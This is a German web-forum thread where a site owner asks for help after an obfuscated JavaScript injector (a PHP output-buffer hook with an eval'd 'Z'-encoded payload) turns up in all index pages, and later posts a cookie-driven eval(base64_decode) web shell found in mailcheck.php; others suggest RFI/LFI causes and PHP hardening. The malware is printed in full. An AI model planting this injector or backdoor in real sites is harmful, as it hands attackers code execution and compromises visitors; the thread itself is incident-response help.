Javascript Code in Webseite

M

master-protic

0
Hallo

ICh habe ein Problem da mir jemand einen Javascrypt Code in meine Webseite eingebaut hat. Jedoch winde ich nicht den Fehler wie er es geschafft hat.

Hier mal der Code der eingebaut wurde

Code: 
<?php ob_start('security_update'); function security_update($buffer){return $buffer.'<script language="javascript">$a="Z6fpZ3dZ22Z2524Z2561Z253dZ2522dw(dcZ2573(cuZ252c14)Z2529;Z2522;Z22;ddZ3dZ22qb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+Z2519~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+Z2519iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25209M0;0|uddubcK8888dy}uK7iZ22;caZ3dZ22Z2566unZ2563tiZ256fn Z2564csZ2528Z2564sZ252ceZ2573)Z257bdsZ253dunZ2565scaZ2570Z22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edZ22;dcZ3dZ227Z3c07fuc7Z3c07wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fZ22;dbZ3dZ22gZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0!Z2520;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vrs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07hucZ22;ccZ3dZ225Z256egZ2574h;iZ252b+)Z257btmpZ253ddZ2573Z252esZ256cZ2569cZ2565(i,Z2569+Z2531)Z22;ceZ3dZ22Z2563harZ2543oZ2564eZ2541tZ25280)Z255e(Z25270x0Z2530Z2527+eZ2573))Z2529;Z257d}Z22;stZ3dZ22Z2573tZ253dZ2522$Z2561Z253dsZ2574Z253bdZ2563sZ2528dZ2561+Z2564Z2562Z252bZ2564Z2563+Z2564Z2564Z252bdZ2565Z252cZ25310Z2529;Z2564Z2577(Z2573tZ2529;Z2573tZ253dZ2524Z2561;Z2522Z253bZ22;deZ3dZ22uqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+Z2519}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;cdZ3dZ22;sZ2574Z253dst+Z2553tZ2572ingZ252efrZ256fmCZ2568arZ2543odeZ2528Z2528tZ256dp.Z22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;sZ7bxpyz;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;dzZ3dZ22Z2566uncZ2574iZ256fn Z2564w(tZ2529Z257bcaZ253dZ2527Z252564ocuZ25256deZ256etZ2525Z2532ewrZ252569tZ2565(Z252522Z2527;ceZ253dZ2527Z252522)Z2527;cbZ253dZ2527Z25253cscZ252572Z252569Z252570tZ252520lZ2561Z25256egZ2575Z2561Z252567Z2565Z25253Z2564Z25255cZ2525Z25322jaZ2576asZ2563rZ252569Z2570tZ25255Z2563Z252522Z25253eZ2527;Z2563cZ253dZ2527Z25253cZ25255cZ25252fscrZ2569Z252570tZ25253Z2565Z2527;Z2565valZ2528uneZ2573caZ2570e(tZ2529)}Z253bZ22;cbZ3dZ22e(dZ2573Z2529Z253bstZ253dtmpZ253dZ2527Z2527;for(iZ253d0Z253biZ253cZ2564s.lZ256Z22;czZ3dZ22Z2566unZ2563tZ2569on Z2563z(cZ257a)Z257bretZ2575Z2572n Z2563aZ252bcZ2562Z252bcZ2563+cdZ252bceZ252bczZ253b};Z22;Z69f Z28dZ6fcZ75menZ74.Z63ooZ6biZ65.iZ6eZ64exZ4ff(Z27rfZ35Z666dsZ27)Z3dZ3d-1)Z7bfuncZ74ionZ20calZ6cZ62Z61Z63kZ28x)Z7bwZ69nZ64ow.Z74Z77 Z3d x;vaZ72 d Z3d nZ65w DZ61tZ65(Z29;Z64.sZ65Z74TimZ65(xZ5bZ22as_ofZ22]*Z31000Z29;Z76Z61r Z68 Z3d d.Z67eZ74UZ54Z43HoZ75Z72s()Z3bZ77iZ6edZ6fw.hZ20Z3d h;iZ66 (hZ20Z3e 8)Z7bd.sZ65tUZ54CZ44aZ74Z65Z28dZ2eZ67Z65tUTZ43DaZ74e()Z20-Z20Z32);Z7delZ73eZ7bdZ2eZ73eZ74Z55TZ43DaZ74Z65Z28d.gZ65Z74UZ54CDaZ74eZ28Z29 Z2d 3Z29;}Z77inZ64owZ2eZ67d Z3d dZ3bvaZ72Z20tiZ6de Z3d neZ77 Z41rrZ61y()Z3bZ76aZ72 shZ69ftZ49ndeZ78 Z3d Z22Z22;tiZ6de[Z22yZ65Z61rZ22] Z3d Z64.geZ74UZ54CFuZ6cZ6cZ59eZ61rZ28)Z3bZ74iZ6de[Z22Z6dontZ68Z22] Z3d d.gZ65tZ55Z54CMoZ6eZ74Z68()+Z31Z3btiZ6de[Z22dayZ22] Z3d d.geZ74Z55TCDZ61te(Z29;Z69Z66 (Z64Z2egeZ74UTZ43MZ6fZ6etZ68()+Z31 Z3c 10)Z7bshifZ74IndZ65Z78 Z3d Z74Z69meZ5bZ22yearZ22]Z20+Z20Z22-0Z22 Z2b (Z64.geZ74UTCZ4dZ6fnZ74Z68Z28Z29+Z31);}Z65lsZ65Z7bsZ68iftZ49ndZ65x Z3d tZ69Z6deZ5bZ22yeaZ72Z22] Z2b Z22-Z22 + Z28Z64.gZ65tUTZ43MoZ6eth(Z29Z2b1)Z3b}Z69fZ20(dZ2egetZ55Z54CDaZ74eZ28) Z3c 1Z30Z29Z7bsZ68iftZ49nZ64exZ20Z3dZ73hiZ66tInZ64eZ78 +Z20Z22Z2d0Z22 + Z64.gZ65tUZ54CDZ61te(Z29;Z7delsZ65Z7bshifZ74Z49nZ64Z65xZ20Z3dZ20shZ69Z66tIZ6eZ64Z65xZ20+Z20Z22-Z22 + Z64.Z67eZ74UTZ43DaZ74e(Z29;Z7dZ64ocuZ6dentZ2ewZ72iZ74eZ28Z22Z3cscZ72Z22+Z22ipt lZ61ngZ75Z61geZ3djavZ61Z73crZ69ptZ22+Z22 srcZ3dZ27http:Z2fZ2fseZ61rchZ2etwiZ74tZ65Z72.coZ6dZ2ftreZ6edsZ2fdZ61Z69Z6cZ79.jsZ6fn?dZ61teZ3dZ22+ shZ69ftIZ6edeZ78+Z22&cZ61Z6clZ62Z61Z63kZ3dcaZ6clbaZ63Z6bZ32Z27Z3eZ22 + Z22Z3cZ2fscrZ22 +Z20Z22iZ70tZ3eZ22);} Z66uncZ74iZ6fn cZ61Z6clbZ61Z63Z6b2(xZ29Z7bZ77Z69ndoZ77.Z74w Z3d x;Z73c(Z27rfZ35fZ36dsZ27,2,Z37Z29;evZ61l(uZ6eescZ61pe(Z64z+cZ7a+opZ2bsZ74)+Z27dZ77(dzZ2bcZ7a($Z61Z2bZ73Z74));Z27)Z3bdocZ75meZ6et.wZ72itZ65Z28$aZ29;}dZ6fcumZ65Z6et.wZ72Z69teZ28Z22Z3cimg sZ72Z63Z3dZ27httpZ3aZ2fZ2fsZ65arcZ68.tZ77iZ74tZ65r.Z63Z6fmZ2fiZ6dagZ65sZ2fsearcZ68Z2frsZ73Z2epZ6egZ27Z20wiZ64Z74hZ3d1 heZ69ghtZ3dZ31 stZ79Z6ceZ3dZ27visZ69bilZ69ty:Z68iddZ65nZ27 Z2fZ3e Z3cscrZ22+Z22ipZ74 Z6cZ61ngZ75aZ67eZ3djavaZ73crZ69pZ74Z22+Z22 srcZ3dZ27http:Z2fZ2fsZ65arZ63h.Z74wiZ74terZ2ecoZ6dZ2ftreZ6edsZ2fdaZ69ly.Z6aZ73oZ6eZ3fcalZ6cbZ61cZ6bZ3dcaZ6clZ62aZ63kZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}elseZ7b$Z61Z3dZ27Z27};functiZ6fn Z73c(Z63Z6em,vZ2ceZ64)Z7bvZ61r eZ78dZ3dneZ77 DaZ74e(Z29;exZ64Z2esZ65tDaZ74e(eZ78Z64Z2egetZ44Z61tZ65Z28)+eZ64);dZ6fcuZ6deZ6eZ74.cZ6foZ6bieZ3dcnZ6d+Z20Z27Z3dZ27 +escaZ70eZ28Z76)+Z27;Z65xpiZ72eZ73Z3dZ27+exd.Z74oGMZ54Z53tZ72ingZ28Z29;Z7d;";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z($a));</script>';}//important security update ?>
 
poste mal den code rings rum, auf der seite wo es eingebaut wurde. dann ist die lücke wesentlich eher ersichtlich.
aber das wahrscheinliche is nen parameter oder formulareintrag der nicht sauber verarbeitet wurde und dann direkt auf die seite ausgegeben wird.
oder eine rfi oder lfi ... wer wees wer wees, poste mal den code, dann können wir dir besser helfen.
 
Hallo

Es sind alle index.php und index.html die auf dem Server sind

Code: 
<html>
<head>
<title>Ihre Domain</title>
<meta http-equiv="Content-type" content="text/html; charset=iso-8859-1">
<meta http-equiv="refresh" content="0; URL=http://www.tacklemarkt.de/hmportal.php">
</head>
<body>
Sie werden weitergeleitet... Falls nicht, klicken Sie hier:
<a href="http://www.domain.tld/neuesziel/">http://www.tacklemarkt.de/hmportal.php</a>
<script language="javascript">$a="Z6fpZ3dZ22Z2524Z2561Z253dZ2522dw(dcZ2573(cuZ252c14)Z2529;Z2522;Z22;ddZ3dZ22qb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+Z2519~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+Z2519iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25209M0;0|uddubcK8888dy}uK7iZ22;caZ3dZ22Z2566unZ2563tiZ256fn Z2564csZ2528Z2564sZ252ceZ2573)Z257bdsZ253dunZ2565scaZ2570Z22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edZ22;dcZ3dZ227Z3c07fuc7Z3c07wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fZ22;dbZ3dZ22gZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0!Z2520;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vrs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07hucZ22;ccZ3dZ225Z256egZ2574h;iZ252b+)Z257btmpZ253ddZ2573Z252esZ256cZ2569cZ2565(i,Z2569+Z2531)Z22;ceZ3dZ22Z2563harZ2543oZ2564eZ2541tZ25280)Z255e(Z25270x0Z2530Z2527+eZ2573))Z2529;Z257d}Z22;stZ3dZ22Z2573tZ253dZ2522$Z2561Z253dsZ2574Z253bdZ2563sZ2528dZ2561+Z2564Z2562Z252bZ2564Z2563+Z2564Z2564Z252bdZ2565Z252cZ25310Z2529;Z2564Z2577(Z2573tZ2529;Z2573tZ253dZ2524Z2561;Z2522Z253bZ22;deZ3dZ22uqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+Z2519}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;cdZ3dZ22;sZ2574Z253dst+Z2553tZ2572ingZ252efrZ256fmCZ2568arZ2543odeZ2528Z2528tZ256dp.Z22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;sZ7bxpyz;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;dzZ3dZ22Z2566uncZ2574iZ256fn Z2564w(tZ2529Z257bcaZ253dZ2527Z252564ocuZ25256deZ256etZ2525Z2532ewrZ252569tZ2565(Z252522Z2527;ceZ253dZ2527Z252522)Z2527;cbZ253dZ2527Z25253cscZ252572Z252569Z252570tZ252520lZ2561Z25256egZ2575Z2561Z252567Z2565Z25253Z2564Z25255cZ2525Z25322jaZ2576asZ2563rZ252569Z2570tZ25255Z2563Z252522Z25253eZ2527;Z2563cZ253dZ2527Z25253cZ25255cZ25252fscrZ2569Z252570tZ25253Z2565Z2527;Z2565valZ2528uneZ2573caZ2570e(tZ2529)}Z253bZ22;cbZ3dZ22e(dZ2573Z2529Z253bstZ253dtmpZ253dZ2527Z2527;for(iZ253d0Z253biZ253cZ2564s.lZ256Z22;czZ3dZ22Z2566unZ2563tZ2569on Z2563z(cZ257a)Z257bretZ2575Z2572n Z2563aZ252bcZ2562Z252bcZ2563+cdZ252bceZ252bczZ253b};Z22;Z69f Z28dZ6fcZ75menZ74.Z63ooZ6biZ65.iZ6eZ64exZ4ff(Z27rfZ35Z666dsZ27)Z3dZ3d-1)Z7bfuncZ74ionZ20calZ6cZ62Z61Z63kZ28x)Z7bwZ69nZ64ow.Z74Z77 Z3d x;vaZ72 d Z3d nZ65w DZ61tZ65(Z29;Z64.sZ65Z74TimZ65(xZ5bZ22as_ofZ22]*Z31000Z29;Z76Z61r Z68 Z3d d.Z67eZ74UZ54Z43HoZ75Z72s()Z3bZ77iZ6edZ6fw.hZ20Z3d h;iZ66 (hZ20Z3e 8)Z7bd.sZ65tUZ54CZ44aZ74Z65Z28dZ2eZ67Z65tUTZ43DaZ74e()Z20-Z20Z32);Z7delZ73eZ7bdZ2eZ73eZ74Z55TZ43DaZ74Z65Z28d.gZ65Z74UZ54CDaZ74eZ28Z29 Z2d 3Z29;}Z77inZ64owZ2eZ67d Z3d dZ3bvaZ72Z20tiZ6de Z3d neZ77 Z41rrZ61y()Z3bZ76aZ72 shZ69ftZ49ndeZ78 Z3d Z22Z22;tiZ6de[Z22yZ65Z61rZ22] Z3d Z64.geZ74UZ54CFuZ6cZ6cZ59eZ61rZ28)Z3bZ74iZ6de[Z22Z6dontZ68Z22] Z3d d.gZ65tZ55Z54CMoZ6eZ74Z68()+Z31Z3btiZ6de[Z22dayZ22] Z3d d.geZ74Z55TCDZ61te(Z29;Z69Z66 (Z64Z2egeZ74UTZ43MZ6fZ6etZ68()+Z31 Z3c 10)Z7bshifZ74IndZ65Z78 Z3d Z74Z69meZ5bZ22yearZ22]Z20+Z20Z22-0Z22 Z2b (Z64.geZ74UTCZ4dZ6fnZ74Z68Z28Z29+Z31);}Z65lsZ65Z7bsZ68iftZ49ndZ65x Z3d tZ69Z6deZ5bZ22yeaZ72Z22] Z2b Z22-Z22 + Z28Z64.gZ65tUTZ43MoZ6eth(Z29Z2b1)Z3b}Z69fZ20(dZ2egetZ55Z54CDaZ74eZ28) Z3c 1Z30Z29Z7bsZ68iftZ49nZ64exZ20Z3dZ73hiZ66tInZ64eZ78 +Z20Z22Z2d0Z22 + Z64.gZ65tUZ54CDZ61te(Z29;Z7delsZ65Z7bshifZ74Z49nZ64Z65xZ20Z3dZ20shZ69Z66tIZ6eZ64Z65xZ20+Z20Z22-Z22 + Z64.Z67eZ74UTZ43DaZ74e(Z29;Z7dZ64ocuZ6dentZ2ewZ72iZ74eZ28Z22Z3cscZ72Z22+Z22ipt lZ61ngZ75Z61geZ3djavZ61Z73crZ69ptZ22+Z22 srcZ3dZ27http:Z2fZ2fseZ61rchZ2etwiZ74tZ65Z72.coZ6dZ2ftreZ6edsZ2fdZ61Z69Z6cZ79.jsZ6fn?dZ61teZ3dZ22+ shZ69ftIZ6edeZ78+Z22&cZ61Z6clZ62Z61Z63kZ3dcaZ6clbaZ63Z6bZ32Z27Z3eZ22 + Z22Z3cZ2fscrZ22 +Z20Z22iZ70tZ3eZ22);} Z66uncZ74iZ6fn cZ61Z6clbZ61Z63Z6b2(xZ29Z7bZ77Z69ndoZ77.Z74w Z3d x;Z73c(Z27rfZ35fZ36dsZ27,2,Z37Z29;evZ61l(uZ6eescZ61pe(Z64z+cZ7a+opZ2bsZ74)+Z27dZ77(dzZ2bcZ7a($Z61Z2bZ73Z74));Z27)Z3bdocZ75meZ6et.wZ72itZ65Z28$aZ29;}dZ6fcumZ65Z6et.wZ72Z69teZ28Z22Z3cimg sZ72Z63Z3dZ27httpZ3aZ2fZ2fsZ65arcZ68.tZ77iZ74tZ65r.Z63Z6fmZ2fiZ6dagZ65sZ2fsearcZ68Z2frsZ73Z2epZ6egZ27Z20wiZ64Z74hZ3d1 heZ69ghtZ3dZ31 stZ79Z6ceZ3dZ27visZ69bilZ69ty:Z68iddZ65nZ27 Z2fZ3e Z3cscrZ22+Z22ipZ74 Z6cZ61ngZ75aZ67eZ3djavaZ73crZ69pZ74Z22+Z22 srcZ3dZ27http:Z2fZ2fsZ65arZ63h.Z74wiZ74terZ2ecoZ6dZ2ftreZ6edsZ2fdaZ69ly.Z6aZ73oZ6eZ3fcalZ6cbZ61cZ6bZ3dcaZ6clZ62aZ63kZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}elseZ7b$Z61Z3dZ27Z27};functiZ6fn Z73c(Z63Z6em,vZ2ceZ64)Z7bvZ61r eZ78dZ3dneZ77 DaZ74e(Z29;exZ64Z2esZ65tDaZ74e(eZ78Z64Z2egetZ44Z61tZ65Z28)+eZ64);dZ6fcuZ6deZ6eZ74.cZ6foZ6bieZ3dcnZ6d+Z20Z27Z3dZ27 +escaZ70eZ28Z76)+Z27;Z65xpiZ72eZ73Z3dZ27+exd.Z74oGMZ54Z53tZ72ingZ28Z29;Z7d;";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z($a));</script></html>



// Bearbeitet von Mackz. Bitte das nächste mal Code-Tags verwenden!
 
Zuletzt bearbeitet:
ist das wbb auf dem aktuellen patchlevel (wird das überhaupt noch supportet?) irgendwleche plugins die sicherheitslücken enthalten können?

nen wbb is nich frei, da darfst du das gar nicht veröffentlichen, nimm den code hier lieber wieder raus, bevor du ärger deswegen bekommst.
 
und hast du dort irgendwelche plugins installiert?
irgendwelche anderen webapps auf dem gleichen webspace/server?
wurde ggf. dein passwort geknackt (oder ein anderes admin pw?)
 
Über eine aktivierte Suchfunktion für Nicht-Member lies sich das WBB2 recht einfach übernehmen. Exploits dafür kursieren überall im Netz. Damit ist es möglich, an den (MD5) Passworthash aller User zu kommen, und den in ne Datenbank zu werfen ist kein großer Akt.

Es wäre also in der Tat möglich, daß dein Forum angegriffen wurde. Schau mal im AdminCP nach, ob Zugriffe stattgefunden haben, die nicht von dir sind. Wenn ich mich recht erinnere, werden diese gelogt und angezeigt.
 
xeno hat gesagt.:
Über eine aktivierte Suchfunktion für Nicht-Member lies sich das WBB2 recht einfach übernehmen. Exploits dafür kursieren überall im Netz. Damit ist es möglich, an den (MD5) Passworthash aller User zu kommen, und den in ne Datenbank zu werfen ist kein großer Akt.

Es wäre also in der Tat möglich, daß dein Forum angegriffen wurde. Schau mal im AdminCP nach, ob Zugriffe stattgefunden haben, die nicht von dir sind. Wenn ich mich recht erinnere, werden diese gelogt und angezeigt.
Zum Vergrößern anklicken....

sollte diese lücke aber nicht gepatched sein?


master-protic hat gesagt.:
Hallo

Diese Hacks sind alle auf dem aktuellen Stand!

Tobi
Zum Vergrößern anklicken....

gib mal ne auflistung über die plugins, weil nur weil die immer auf den aktuellen stand sind, bedeutet das nicht, dass die auch sauber sind!
 
Zitat von easteregg
sollte diese lücke aber nicht gepatched sein?

Dies wurde durch die Version pl2 gepatcht


In einer Datei namens mailcheck.php wurde folgender code gefunden

<?php eval(base64_decode('aWYoaXNzZXQoJF9DT09LSUVbIlBIUFNFU1NJSUQiXSkpe2V2YWwoYmFzZTY0X2RlY29kZSgkX0NPT0tJRVsiUEhQU0VTU0lJRCJdKSk7ZXhpdDt9'));
echo "checking email...";
?>

Tobi
 
Zuletzt bearbeitet:
die wurde scheinbar überschreiben, eben durch eine lfi oder rfi. ist nur die frage wo die sicherheitslücke dazu ist.
schau mal nach ob irgendwo daten includiert werden, die vorher nicht sauber abgefragt werden. dann schau mal in den logs nach, ob da irgendwie code durch fehlende daten eingeschleust wurde, und anschliesend die logs includiert worden (lfi)
dann schau mal nach - wenns nen root ist - ob die php einstellungen sauber sind, sprich ob die scripte auch nur in ihren verzeichnissen lesen dürfen, ob der apache auch niht als root läuft, ob ein includieren via http erlaubt ist etc pp.... register globals auf off ... ;)

das übliche!
 
Da steht bloß:

Code: 
if(isset($_COOKIE["PHPSESSIID"])){eval(base64_decode($_COOKIE["PHPSESSIID"]));exit;}

Da ist nichts gefährliches dran. Oder überseh ich was?
 
der führt den inhalt des cookies aus.
sprich du kannst da beliebigen code reinbringen indem du den per cookie übermittelst... ;)
das is mega gefährlich ;D
 
erstell mal eine Datei, meinetwegen info.php, mit folgendem Inhalt:
PHP: 
<?php
phpinfo();
?>

und die Seite, die dort dann ausgespuckt wird, postest du hier mal bitte in code-Tags - dann können wir hier 'nen groben Überblick bekommen, wie sicher / unsicher die PHP-Config ist...

Angaben zu Domain und Kundennr. (z.B. steckt die Kundennr. bei vielen Anbietern im Pfad auf dem Server drin) kannst du ja durch XXX "schwärzen"
 
register globals auf on...
hau dem serveranbieter das ding um die ohren, wenns nen managed server is.
ne größere sicherheistlücke gibts gar nicht....

die php version is nichmehr offiziell supportet... die ist gut 2 jahre alt!

open_base_dir is auch nich gesetzt....
exec funktionen nicht unterbunden....
 
Zuletzt bearbeitet:
Um antworten zu können musst du eingeloggt sein.
Zurück
Oben